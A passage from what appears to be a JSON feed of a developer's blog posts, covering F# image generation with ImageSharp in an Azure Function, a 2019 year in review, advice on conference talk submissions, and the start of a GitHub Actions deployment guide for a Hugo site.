RectangularPolygon(xStart, gutter, width - xStart - gutter - cornerRadius, cornerRadius)) |> ignore) image Using the RectangularPolygon struct again we just manipulate some starting positions to fill in the three gaps with a rectangle the width (or height) of cornerRadius.\n🎉 We now have a box with rounded corners that looks like it is a single shape but is really made up of a bunch of smaller ones. A point to note is that you can simplify this a bit further by removing the left & right “fillers” and expanding the width of the inner box, but I found that doing so made it a lot harder to track how everything was drawn and positioned, so I’ll take the few extra CPU cycles as the cost of maintainability.\nAdding a Drop Shadow It wouldn’t be modern web design if we didn’t have a drop shadow to make everything pop and the simplest way for us to do a drop shadow of the box is to draw a second box at a slight offset that represents the shadow effect. Now in reality the shadow is drawn first on the canvas since we’re layering everything over the top of it. Let’s expand our generateBox function to have two more arguments that represents the offset of the shadow relative to the main box. 
Again this won’t be the most efficient solution as we’re going to be drawing a shadow for parts that aren’t visible, but again it’s a small cost of CPU cycles to make it more maintainable.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 let cornerRadius = 10.f let gutter = 20.f let generateBox (colour: Color) (width: float32) (height: float32) (xOffset: float32) (yOffset: float32) (image: Image<Rgba32>) = let xStart = gutter + cornerRadius let yStart = gutter + cornerRadius // main box image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon (xStart + xOffset, yStart + yOffset, width - xStart - gutter - cornerRadius, height - yStart - gutter)) |> ignore) // left gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(gutter + xOffset, yStart + yOffset, cornerRadius, height - yStart - gutter)) |> ignore) // right gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon(width - xStart + xOffset, yStart + yOffset, cornerRadius, height - yStart - gutter)) |> ignore) // top gutter image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, RectangularPolygon (xStart + xOffset, gutter + yOffset, width - xStart - gutter - cornerRadius, cornerRadius)) |> ignore) // rounded corner - left top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(xStart + xOffset, yStart + yOffset, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) // rounded corner - right top image.Mutate(fun ctx -> ctx.Fill (GraphicsOptions(true), colour, EllipsePolygon(width - xStart + xOffset, yStart + yOffset, cornerRadius * 2.f, cornerRadius * 2.f)) |> ignore) image Here we have a liberal sprinkling of the offset values to shift the box right and down as that’s the direction we’re going with the shadow (assuming a positive offset is passed in, negative will go up and left).\nGenerating Text The final thing we need to do with our image is write the text that we want on it. We’ll be putting the title as the main heading and then a subheading that is the author name, published date and the tags. To generate the text we’ll use the SixLabors.Shapes.Text (version 1.0.0-beta0009 at the time of writing) and SixLabors.ImageSharp.Drawing (version 1.0.0-beta0007 at the time of writing) NuGet packages.\nDisclaimer: I struggled a lot with doing text properly and while I have a working solution, I’m not sure if it’s the most efficient. I primarily modeled it off this sample so if there’s a better way to do it, please let me know.\nLet’s add another function to ImageCreator.fs:\n1 2 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = image The first thing we need to do to render some text is to choose a font to render it using. For portability I’m going to pick a font off the host machine rather than trying to create one and we can do that with the SystemFont.Find method that the library provides. 
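If you’re not sure which families the host actually has, SixLabors.Fonts can also enumerate them, which is handy for debugging; a small sketch, assuming the SystemFonts.Families property exposed by the beta packages used here:

// List the font families the host knows about; Find throws if a family is missing.
SystemFonts.Families
|> Seq.iter (fun family -> printfn "%s" family.Name)

let consolas = SystemFonts.Find "Consolas"   // assumes a Windows host
let font = Font(consolas, 30.f)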
One thing to be aware of if you work across multiple OSes your available fonts will vary, I got caught out with this because I dev on Linux (via WSL2) but deployed to a Windows-hosted Azure Function, so the fonts were different!\n1 2 3 4 5 6 7 8 9 let getFontName = match Environment.OSVersion.Platform with | PlatformID.Unix -> "DejaVu Sans Mono" | _ -> "Consolas" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) image To handle this OS-variation I use a function that checks the OS I’m on and gives me a different font name so I can find the right font family and from that create a Font object with the right fontSize.\nNow we need to generate a path which the text will be rendered along, this took a bit for me to understand but once I realised the point I realised how powerful it is. With ImageSharp each character in the string of text is a separate glyph that can be rendered and you can control where that goes relative to what’s preceded it. This makes it easy to have text follow a non-linear path (such as circular text) making complex text generation really easy. To do this we use a PathBuilder from SixLabors.Shapes and add points for shapes to appear on.\nBut we just need a straight path for the text to follow so we only need a single step in our path that goes through to nearly the edge of the image:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 let getFontName = match Environment.OSVersion.Platform with | PlatformID.Unix -> "DejaVu Sans Mono" | _ -> "Consolas" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() image On line 11 we set where the first glyph will appear to be double the gutter width, so we end up with a consistent gap from the edges. Next we’ll add a line to be followed starting from the x position of the origin and a provided y position that will then run through to the right as far as we let it (the passed in xEnd value) with a consistent y. This results in a nice straight horizontal line for the text to follow. Finally we generate a path from the PathBuilder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning image We need to create some options to control how the text is drawn onto the canvas (we’ll provide it to the Fill method eventually). First is the TextGraphicsOptions which is similar to the GraphicsOptions we used for shapes, but it has some text-specific properties, namely when to wrap. You might notice the mutable keyword on the let binding. 
This is because F# objects are immutable by default but we have to set some properties after construction (the same goes for RenderOptions).\nWith the TextGraphicsOptions created we can create the RendererOptions and copy some of the properties across. RendererOptions is used to control how the glyphs are created from the string of text so we provide it with the font we want to use and the DPI for the font.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning let glyphs = TextBuilder.GenerateGlyphs(text, path, ro) image.Mutate(fun ctx -> ctx.Fill(opts, Color.Black, glyphs) |> ignore) image With the options ready we can generate the glyphs along the path using the RendererOptions and then mutate the image to render out the text. But we’ve got a compilation error. It turns out that TextGraphicsOptions doesn’t inherit from GraphicsOptions, instead it relies on a custom explicit operator to convert. Well that’s annoying as F# doesn’t have a built-in way to handle the explicit casting like C#, instead you can call the op_Explicit function from the declaring type, or use a little snippet:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 #nowarn "77" let inline (!>) (x:^a) : ^b = ((^a or ^b) : (static member op_Explicit : ^a -> ^b) x) #warn "77" let addText (text: string) (fontSize: float32) (xEnd: float32) (y: float32) (image: Image<Rgba32>) = let fam = getFontName |> SystemFonts.Find let font = Font(fam, fontSize) let pb = PathBuilder() pb.SetOrigin(PointF(gutter * 2.f, 0.f)) |> ignore pb.AddLine(0.f, y, xEnd, y) |> ignore let path = pb.Build() let mutable opts = TextGraphicsOptions true opts.WrapTextWidth <- path.Length let mutable ro = RendererOptions(font, 72.f) ro.HorizontalAlignment <- opts.HorizontalAlignment ro.TabWidth <- opts.TabWidth ro.VerticalAlignment <- opts.VerticalAlignment ro.WrappingWidth <- opts.WrapTextWidth ro.ApplyKerning <- opts.ApplyKerning let glyphs = TextBuilder.GenerateGlyphs(text, path, ro) image.Mutate(fun ctx -> ctx.Fill(!> opts, Color.Black, glyphs) |> ignore) image Here we’re defining a custom operator, !>, that will handle the explicit cast for us (I don’t claim credit for it, credit to StackOverflow). We also disable the complier warning #77 which tells us to be careful about using op_Explicit as the compiler can do some optimisations with it, but it’ll be fine!\nBringing It All Together With our two core functions created it’s time to wire everything up and plug it into the Azure Function we started with. Since we’ll have to call each function a few times let’s create a helper makeImage function to get our Image<Rgba32> instance:\n1 2 3 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image This function will take all the information it requires so it’s not tied to our parsing of the blog data. 
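Which also means it can be called with whatever values you like; something along these lines, where the dimensions and metadata are made up for illustration rather than being what the site uses:

// Hypothetical call, just to show the shape of the arguments.
let card =
    makeImage 1024.f 512.f
        "Generating Images with Azure Functions"
        "Aaron Powell"
        DateTimeOffset.Now
        [| "fsharp"; "serverless" |]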
When creating the Image<Rgba32> we provide it a width and height, but they are defined as a float32 (since that’s mostly what we need them as) so they are boxed as int for the constructor (this is so ImageSharp can work with sub-pixel graphics but the final image is to a whole pixel).\nUp until now the background has been transparent, but let’s give it a colour to help it pop:\n1 2 3 4 5 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image.Mutate(fun ctx -> ctx.Fill(Color.FromHex "02bdd5") |> ignore) image And finally we’ll call generateBox and addText\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 let makeImage width height title author (date: DateTimeOffset) tags = let image = new Image<Rgba32>(int width, int height) image.Mutate(fun ctx -> ctx.Fill(Color.FromHex "02bdd5") |> ignore) let textX = width - (gutter + cornerRadius) * 2.f let textY = height / 2.f generateBox (Color.FromHex "333") width height 5.f 5.f image |> generateBox Color.White width height 0.f 0.f |> addText title 30.f textX textY |> addText (sprintf "%s | %s" author (date.ToString "MMMM dd, yyyy")) 20.f textX (textY + 40.f) |> addText (tags |> Array.map (fun t -> sprintf "#%s" t) |> Array.toSeq |> String.concat " ") 15.f textX (textY + 70.f) Since all these methods return the Image<Rgba32> we can leverage F#’s pipeline operator to pass everything through in a nice pipeline. You’ll also see that when we call addText we start with the y position being half the height of the image (title is vertically aligned in the middle) and then increase the offset from that for the other lines of text so it doesn’t overlap.\nThe resulting output is an image like so:\nAll that is left now is to return that from the Azure Function.\nConnecting With Our Function 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 [<FunctionName("BlogCardGenerator")>] let run ([<HttpTrigger(AuthorizationLevel.Function, "get", Route = "title-card/{id}")>] req: HttpRequest) ([<Blob("title-cards/{id}.png", FileAccess.ReadWrite, Connection = "ImageStorage")>] postImage: ICloudBlob) (id: string) (log: ILogger) = async { log.LogInformation <| sprintf "ID: %s" id let! blogData = getBlogMetadata() match tryFindPost id blogData.Posts with | Some post -> let! exists = postImage.ExistsAsync() |> Async.AwaitTask if exists then log.LogInformation "Image existed" let! ms = downloadImage postImage return FileStreamResult(ms, "image/png") :> IActionResult else let title = post.Title let author = "Aaron Powell" let date = post.Date use image = makeImage width height title author date post.Tags let ms = imageToStream image do! postImage.UploadFromStreamAsync ms |> Async.AwaitTask ms.Position <- int64 0 return FileStreamResult(ms, "image/png") :> IActionResult | None -> return NotFoundResult() :> IActionResult } |> Async.StartAsTask We unpack the metadata from our post (title and tags) then call our makeImage function that returns us the Image<Rgba32> object. Since we know that it doesn’t already exist in storage we’ll write it back by converting it to a stream:\n1 2 3 4 5 let imageToStream (image: Image<Rgba32>) = let ms = new MemoryStream() image.SaveAsPng ms ms.Position <- int64 0 ms And using the ICloudBlob UploadFromStreamAsync function to write it. 
Once we reset the stream position it can be handed over to FileStreamResult and the client will get the image.\nConclusion I hope you’ve enjoyed this look at how we can generate and store images using Azure Functions and ImageSharp. If you’re looking at how to manipulate an existing image, check out this tutorial which also uses ImageSharp.\nHere we were looking at the primitives: how to create the base shapes, overlap them appropriately and then draw some text across them.\nWe also saw how to combine the HTTP trigger with a Blob input binding so that we get a connection to our blobs set up without needing to do a lot of the wire-up ourselves. If you want to see the complete solution you’ll find it on my GitHub.\nWe didn’t cover how to deploy to Azure, but there are plenty of docs already on that. I’m using GitHub Actions for this project, you’ll find them here.\nAnd if you have any advice on how to improve the image generation, let me know!\n", "id": "2020-01-03-generating-images-with-azure-functions" }, { "title": "2019 a Year in Review", "url": "https://www.aaron-powell.com/posts/2020-01-02-2019-a-year-in-review/", "date": "Thu, 02 Jan 2020 11:45:14 +1100", "tags": [ "year-review" ], "description": "A look back at the year that was", "content": "It’s only the 2nd of January and I’m already starting my Year In Review post?! It wasn’t until the 8th of January that I did my 2018 one.\nCareer-wise, 2019 has been a pretty massive year for me. I started it off by taking a job at Microsoft which has been a roller coaster ride. I’m nearly 12 months in, so I’ll update my 6 months at Microsoft post when I hit that next milestone.\nBy the numbers it’s not surprising that I was so exhausted by the end of the year: I gave 6 conference talks (and another dozen or so user group talks), wrote 58 articles, and took 11 trips across 2 countries with a total of just shy of 73,000km travelled.\nBlogging If I was to summarise what I did in 2019 it would be blogging. I spent a lot of time blogging this year, producing 58 new articles!\nOne of the goals I had for how I would blog this year was to do more series-based posts rather than lots of standalone pieces of content. I created a series on learning WebAssembly with Golang, dabbled with IoT, started diving into IL and looked at monitoring SPAs. I find series a great way to explore an idea in a really deep way as you can focus each post on a single piece of the solution.\nI also started syndicating my content through to the DEV community as an experiment in extending my reach, which may come as a surprise if you’ve read my previous writings around content ownership. I’m nearly 12 months into the experiment and I think I have some insights out of it.\nSpeaking I was rejected from a lot of conferences in 2019 but I still got to a number of events and was able to get a good amount of value out of them (plus do more than enough travel for the year!). The negative to this was that I was unable to get to some of the user groups that I was previously a frequent attendee at, so I started to disengage from some communities. My hope is that in 2020 I’ll be able to better prioritise my time and get back to some of these events.\nNew Site If you’re a regular reader of my site via the browser you may notice it looks different to how it used to look. I decided that the design of my blog was a little tired and I wanted to update it.
After shopping around the Hugo theme gallery I found one I quite liked and installed it; unfortunately, it turned out to rely on around 10 jQuery plugins, some CSS frameworks and a bunch of other bloat, and I was blown away by how heavy it was. So that led to this tweet.\nI'm doing my first website design from scratch with no frameworks after like 10 years.\nWhere are some good references on what are good baseline dimensions for content width, etc.?\n— Aaron Powell (@slace) December 4, 2019 Over the course of a few weeks in December I chipped away at a new theme for my website, inspired by themes I liked, with the CSS written entirely from scratch without a template. This is the first time I’ve done “from scratch” CSS in a long time and it’s been an interesting experience. I know my site isn’t 100% perfect so if you hit anything that’s broken/ugly/etc. please log a bug on this GitHub repo.\nI’ve also added a section to the site about my public speaking, with a link to a number of talk abstracts I can give as well as upcoming and past speaking engagements. You’ll also see a list of upcoming speaking engagements on the homepage.\nI also created a little tool that’ll generate images for sharing posts where the Open Graph Protocol is used, so there’s a pretty title card rather than a huge photo of me like it used to show.\nLooking Forward What am I hoping to achieve in 2020? Well, to kick off the year I have a lot of travel lined up, so my main goal is to not get divorced! 😆\nJokes aside, I’m going to be trying to focus more on some of my core technologies, JavaScript and .NET in particular. My hope is to get back into some of the Sydney tech communities and see how best I can support them in a number of different ways.\nHope to see you around some events!\n", "id": "2020-01-02-2019-a-year-in-review" }, { "title": "Reflecting on 12 Months Submitting to Conferences", "url": "https://www.aaron-powell.com/posts/2019-12-19-reflecting-on-12-months-submitting-to-conferences/", "date": "Thu, 19 Dec 2019 09:52:00 +1100", "tags": [ "speaking" ], "description": "You win some, you lose some, but that's how conferences go.", "content": "A few weeks ago I put up what was intended to be a throw-away tweet.\nGoing over my talk submissions for 2019. This is my hit-rate from just one submission tool.\nRemember folks, you'll be rejected from a lot more talks than you are accepted! pic.twitter.com/4sbcn1QhrS\n— Aaron Powell (@slace) November 29, 2019 This tweet shows the success, or lack thereof, when it came to submitting to conferences this year, and this is only a snapshot of one platform, Sessionize, that I’ve submitted via. I also have rejections in Papercall.io and countless Google Forms. So from 4 talks across 7 events (total of 8 submissions) I only had 1 talk accepted. That’s not even 100% accurate for Sessionize; I actually submitted 16 sessions across 7 different talks to 7 events, of which 1 was selected. Wait, that doesn’t sound any better! 😕\nTaking all other systems into account I presented 6 talks at 6 events (and attended a few others) and was rejected from at least that many events on top of what you see in the screenshots above.\nThe tweet I put up sparked some good discussions with people about getting into speaking at events, so I thought I’d take some time to share a bit of my experience.\nI gave my first conference talk a decade ago at the very first DDD Melbourne.
When I gave that talk I’d only attended a single conference, that was the Umbraco conference in Copenhagen, but I hadn’t been there to speak, just attend as a contributor to the project. Back in 2010 the conference scene was very different to what it is now, there wasn’t that many events and the events that existed tended to be vendor-centric events, like Microsoft TechEd, with thousands of attendees and a price-point to match. So when I saw people talking about DDD Melbourne I was interested in the idea of a conference that I could attend without needing to raise a lot of money for and that I, as a nobody in the tech community, could submit a talk to with the hope of presenting.\nFast forward to 2019 and I’ve been lucky enough to speak at dozens of events around Australia and the world and made it part of my job. But for every event I’ve spoken at there’s many more that I was rejected from, I wouldn’t have a clue how many talks I’ve been rejected from over the years, it’s beyond the point where I’d bother to keep count.\nAnd with the doom and gloom aside, let’s talk about some positive and practical things around getting into conferences.\nRejection Is Part Of Life This doesn’t sound like a positive first point, but hear me out. When you break it down it’s a numbers game, there’s only so many slots at a conference and only so many conferences that you’re almost always going to be over-indexed in the number of submissions. I’ve worked on the agenda for NDC Sydeny twice and each year we would receive over 600 submissions for the approximately 100 slots to fill (taking into account pre-booked speakers).\nSo going in with the understanding that you may not make it in and that isn’t the end of the world is a good perspective to have. Some events will be able to provide feedback on why your talk wasn’t selected but in my experience, there aren’t many events that can do that. Take NDC Sydney for example, it’s hard to be able to give personalised feedback to a few hundred people, but also sometimes the reasons are that there were just too many good talks and a coin was flipped.\nAnd don’t be a sore loser if you aren’t accepted. It’s frustrating and you might want to share your frustration on twitter by saying a conference has played favourites or had some unfair biases in the selection. That’s not going to help you and it’s more likely that you’d end up on a blacklist instead. Many conferences do have blacklists, whether they are people who violated the code of conduct, presented a misleading talk (turned out to be a blatant sales pitch) or presented themselves in a way that is against how the conference wants to be represented.\nWith that in mind, what can you do to improve your odds?\nRestrict The Number Of Submissions Some events are starting to place limits on the number of talks that they will accept from potential speakers, but not all do. If you’re submitting to an event without a submission cap don’t look at that as a license to go crazy. I’ve been on the agenda team for events where there have been people submitting upwards of 10 talks. When I see this it makes me wonder if the person has a handle on what they can bring to the event or are they just throwing everything at the wall with the hope that something sticks. 
And to have produced that many abstracts, how much time has gone into thinking through the story that you want to give to the audience?\nHaving only a small number of talks that you are constantly refining will help to solidify who you are and why you are an authority to speak on such a topic. Which leads me to the next point.\nAre You Known For That? While most events will anonymously do initial reviews, at some points they will look at the name of who submitted the talk and use that as part of the final decision. Conferences will strive to have the people speaking be people who are knowledgable on a topic, an authority if you will, so what makes you that person? Have you been writing about it on a blog? Answering questions of Stack Overflow? Discussing it on Twitter? Presenting at meetups about it?\nThis can be the difference when it comes to final reviews of sessions when you’ve got similar content or just a lot of really strong options to pick from.\nFor me, I tend to extract talk ideas out of blog posts that I’ve written. This means that I’ve been able to “prove” the content in the market by writing about a topic and that there’s more than just a single talk submission to show that I know what I’m talking about. And this is why it’d be unlikely that I’d submit a talk about Kubernetes to a conference, as I have no previously demonstrated knowledge in that area.\nReuse Some people think that for each event they submit to the talk needs to be 100% new meaning they are always trying to come up with new ideas and are exhausted at the prospect. This isn’t the case though. Now, I wouldn’t be submitting the same talk to the same conference but that doesn’t mean that you can’t submit it to other events. After all, the attendees aren’t going to all the same at each event, especially if you’re submitting to events in multiple different cities/countries.\nI, in fact, have a talk about Docker that I’ve been giving at least once per year for the last three years and I hope to keep giving it. Giving the same talk multiple times can be really enjoyable. You get an opportunity to refine it from the previous deliveries, expand on areas based on feedback and avoid the stress of having to write a new talk in the lead up to a conference!\nEach year I’ll produce a couple of new talk ideas, retire some old ones and continue to refine my favourites.\nYour Submission This is the critical piece of the puzzle to getting accepted, if you don’t write a submission you’re really unlikely to get accepted! 🤣\nBut how do we go about writing a good submission? There are countless articles online about this and I’ll share what I’ve learnt over the years.\nThe Title I’d argue that the title is the most important piece of information about your talk. It’s the hook that you use to get people to read more, whether it’s those reviewing the agenda or at attendee at the event.\nThe title should be short and to the point, but it’s also a place where you can inject a bit of your personality (I like to use wordplay in the titles I created, but that’s not for everyone). Let’s take the title of one of my favourite talks, Docker, FROM scratch. Here it’s clear what the tech we’ll be covering is, it’s Docker, and read literally, the talk implies it’s something beginner centric or getting basic. 
Then there’s the fact that FROM is capitalised in it, and if you haven’t used Docker you’re going to assume there’s a reason for it, whereas if you have used Docker you’ll identify that it’s from a Dockerfile.\nAlso, try to avoid being too cliche with titles. Phrases like “from the trenches” are overdone and I would avoid using them. Similarly with click-bait style titles, they often just come across as gimmicky.\nThe Abstract While the title is to grab someone’s attention the abstract is to sell the talk. Like a title you want it to be to the point, no more than a few paragraphs, remember, your goal is to get people to attend your talk and learn something, not to learn it all from the abstract. I like to start by framing the narrative I plan to tell.\nDocker’s popularity has exploded over the last couple of years, especially in the DevOps space, but unless you’ve spent a lot of time in that area it can be a confusing technology to wrap your head around.\nFrom here you can then go into why you’re the one to talk about this, how you’ll show off your knowledge, etc.\nAn abstract can be written in either the first or third person and that will come down to how you like to represent your talk idea. When I write an abstract around a particular bit of tech/product/problem I’ll often go to third person.\nWe’ll look at how to apply x to y.\nWhereas if I’m writing a talk that’s purely about my experience I’ll go to first person.\nI’ll show you how I learnt about x.\nBut experiment with it, see what reads well when you read it back.\nAlso think about creating an elevator pitch, a single sentence that summarises your talk as some events may use that.\nYour Bio The final main piece of any submission is your bio. Use it to tell people who you are and why you are the person who should speak on a particular topic. Keep it short, only a paragraph or two, don’t mistake this for a resume, focus on the information about you that is relevant for the event, if you’re submitting to a front-end web event, your in-depth knowledge of SQL Server might not be that important.\nI like having a couple of different length bios, a one-liner for meetups and summaries plus a full bio for conferences.\nSubmission Don’t When it comes to writing your submission there are a few things that will hurt rather than help you.\na long and rambling abstract that lacks any form of punctuation grammer correct spelling or capitalisation will not be doing you any favours so remember that you should always put it through a spell checker and or a grammar checker even something as simple as pasting it into a word document to do a sanity check before submitting will be valuable as a poorly written abstract doesn’t do much to help your credibility as someone who is knowledgable in a certain area.\nThe same can be said about your title and bio, if you can’t take the time to ensure you’ve spelt words correctly, properly cased product names or ensured you have punctuation, how does that give confidence to the event that you’ll put the effort in for them?\nSpeaking of professionalism, don’t be overly critical of things in your abstract. 
Your talk may be about one framework when there are others, but don’t bad-mouth the others, it’s not going to be constructive nor will it show that you’re being objective.\nGet A Peer Review Once you’ve written everything down as friends and co-workers to have a read of it and give you their thoughts, after all, they are the kind of people who you want to attend the talk, so why not see if they are finding it interesting.\nWhere To Submit This is probably important isn’t it, after all, if you don’t have somewhere to submit your talk then what’s the point? 🤔\nTrying to work out what’s on when can be difficult, with dozens of events happening around Australia and most of them announcing via Twitter it’s easy to miss them. My first point of call is to check out the DevEvents GitHub repository, which is a crowd-sourced list of conferences happening around Australia including important dates and a link to the event (and if you learn of one that’s not there, submit a PR!).\nBe aware that a lot of conferences in Australia happen between August and November, probably related to the new financial year budgets being available to sponsors, but this can result in a mad rush of events opening their Call For Papers (CFP) and a lot of travel in a short period.\nWhen To Write The Talk You’ve written a submission that you’re excited about, so it’s time to sit down and write the talk right? I hold off, I won’t start writing my slides/demos until after I know I’m giving a talk. Mainly I do this because I don’t want to “waste the effort” in writing a talk I might never deliver. But given that a lot of the talks I do are based off blogs that I’ve previously written I will have a starting point that I can write the talk from, which I find speeds up the process.\nConclusion This is a bit of a random hodge-podge of ideas rolled together into a post based on my experience on public speaking over the last 10 years.\nIt might look like it’s been a tough year, doing 6 talks out of the ~30 submissions, but it’s pretty standard. Sure, it’s frustrating when you submit a talk that you’re really excited to deliver only to have it rejected, but it’s not the end of the world.\nIf you’re looking to get into conferences I’d encourage you to attend a Global Diversity CFP Day if there’s one in a city near you. Also, here’s two articles that I think are quite helpful in creating a good submission.\nI’m also happy to review topics for people before they submit, just drop me a message.\nGood luck!\n", "id": "2019-12-19-reflecting-on-12-months-submitting-to-conferences" }, { "title": "Implementing GitHub Actions for My Blog", "url": "https://www.aaron-powell.com/posts/2019-12-17-implementing-github-actions-for-my-blog/", "date": "Tue, 17 Dec 2019 08:50:14 +1100", "tags": [ "devops", "azure" ], "description": "A look at how to deploy a Hugo static website to Azure Static Websites and Azure CDN.", "content": "While I was doing the work to host my Blazor search app within my website I realised I’d need to update the deployment pipeline I use for my blog. The process being used was very similar to the one used for the DDD Sydney website, but tweaked for use with Hugo. 
As it was setup a while ago I used the UI designer in Azure Pipelines, not the YAML approach so this seemed like the perfect opportunity for an overhaul.\nBut if I’m going to go in for an overhaul and port to YAML I decided it was time to learn something that’d been on my backlog, GitHub Actions, after all, I’ve used Azure Pipelines extensively, so why not learn something new and compare/contrast the two products?\nThe Moving Parts With my website there are three pieces that I need to handle, generating a static website using Hugo, generating the Blazor WebAssembly application and deploying to Azure Static Websites while updating Azure CDN. I’ll try and break this article down into those three pieces so that if one of them isn’t relevant to you it’ll be easy to focus on the parts you need most.\nMy First Action If you haven’t worked with GitHub Actions yet, they appear under a new tab on your repository called Actions. With GitHub Actions you create a Workflow that will run on a number of different triggered events in GitHub, issues being created, PR’s raised, commits pushed and many others. There’s a guide that you can follow along in the GitHub UI to get started, but if you’re wanting to start in an editor the first thing you’ll need to do is create a new folder in your repo, .github/workflows, and add a YAML file to it. This file can be named anything, so long as it has a .yml or .yaml extension, mine is named continuous-integration.yml.\nFrom here we can define the metadata about our Workflow:\n1 name: Build and Deploy Website Environment variables:\n1 2 env: OUTPUT_PATH: ${{ github.workspace }}/.output And what triggers the Workflow:\n1 2 3 4 on: push: branches: - master This gives us a starting like so:\n1 2 3 4 5 6 7 8 name: Build and Deploy Website env: OUTPUT_PATH: ${{ github.workspace }}/.output on: push: branches: - master In which we can then create jobs, which are the things our Workflow does.\n1 2 3 4 jobs: job_name: runs-on: <platform> steps: <steps to run> The runs-on is similar to the pool in Azure Pipelines and is used to specify the platform that the Workflow will run on (Linux, MacOS or Windows). After that, we define some steps for what our Job does by specifying Actions to use from the marketplace or commands to run.\nSteps will often have a uses directive which specifies the Action to run the step “tasks” under. This will either get something from the Actions marketplace or a custom Action within your git repo.\nMy colleague Tierney Cyren has a fantastic intro guide that you should check out to understand the building blocks (I used it as a reference myself when creating this Workflow!).\nAnd with the primer handled let’s start creating jobs for each piece we need to handle.\nTermonology Summary Just to summarise some of the new terms we’ve been introduced to:\nGitHub Actions - the product we’re using from GitHub Actions - things we can get from the marketplace (or build ourself) that defines what we can do Workflow - A series of Environment Variables, Jobs and Steps undertaken when an event happens Jobs - What our Workflow does Steps - A task undertaken by a Job using an Action Generating The Static Website My blog uses Hugo, a simple static website generator written in Golang that consists of a single binary. All the content I need for my blog is in my GitHub repo and I even keep the Hugo binary in there so it’s easy to just clone-and-run. 
So it’s really simple, but let’s look at how to do it via GitHub Actions.\nLet’s start by defining a Job for this Workflow:\n1 2 3 jobs: build_hugo: runs-on: ubuntu-latest The Job name is build_hugo, I like to name things with a prefix for their role (build or deploy) and the role it’s performing, but the naming convention is up to you, just make sure it makes enough sense for when you look at it in 2 months!\nI’ve specified that we’re going to use the ubuntu-latest image as our base because Hugo can run on Linux and it’s a simple image to use.\nThis Job is a “Continuous Integration” Job, meaning it needs access to the “stuff” in our git repository so the first step we’re going to want to perform is a git checkout, and for that we can use the actions/checkout@v1 Action (note: I’m pinning the version to v1):\n1 2 3 4 build_hugo: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 This Action doesn’t require anything other than to be used for the checkout to happen on master, but if you’re using it with a PR you might want to tweak it. For that check out the Action documentation.\nBuilding Hugo in an Action Given I have the Hugo binary in the git repo I could just run that as a shell script, but I decided to look at whether or not I could do it “more Action-y” and I was pointed to peaceiris/actions-hugo. This is a pre-built Action designed to work with Hugo.\nOutputting Information from a Step When we use the Hugo Action we need to give it the version of Hugo that we want to use (which it’ll download for us), and I figured that since I have the Hugo binary, why not ask it what version it is? Let’s add another Step to our Job that runs a script on the default shell:\n1 2 3 4 5 6 7 8 9 10 build_hugo: runs-on: ubuntu-latest steps: - uses: actions/checkout@v1 - name: Get Hugo Version id: hugo-version run: | HUGO_VERSION=$(./hugo version | sed -r 's/^.*v([0-9]*\\.[0-9]*\\.[0-9]*).*/\\1/') echo "::set-output name=HUGO_VERSION::${HUGO_VERSION}" This runs the ./hugo version command to give me a rather verbose string that is passed to an ugly sed regex to generate an environment variable available within this Step. But since we’ll need it in a different Step we have to turn it into Step Output, and we do that with this line:\n1 echo "::set-output name=HUGO_VERSION::${HUGO_VERSION}" If you’ve used Azure Pipelines it’s similar to the ##vso[task.setvariable variable=MyVar]some-value weirdness you may have used.\nThe other bit of information you need on the Step is the id, as that is how you can refer to it from other Steps.\nGenerating Hugo Output With the Hugo version in hand we can now generate the HTML output:\n1 2 3 4 5 6 7 - name: Setup 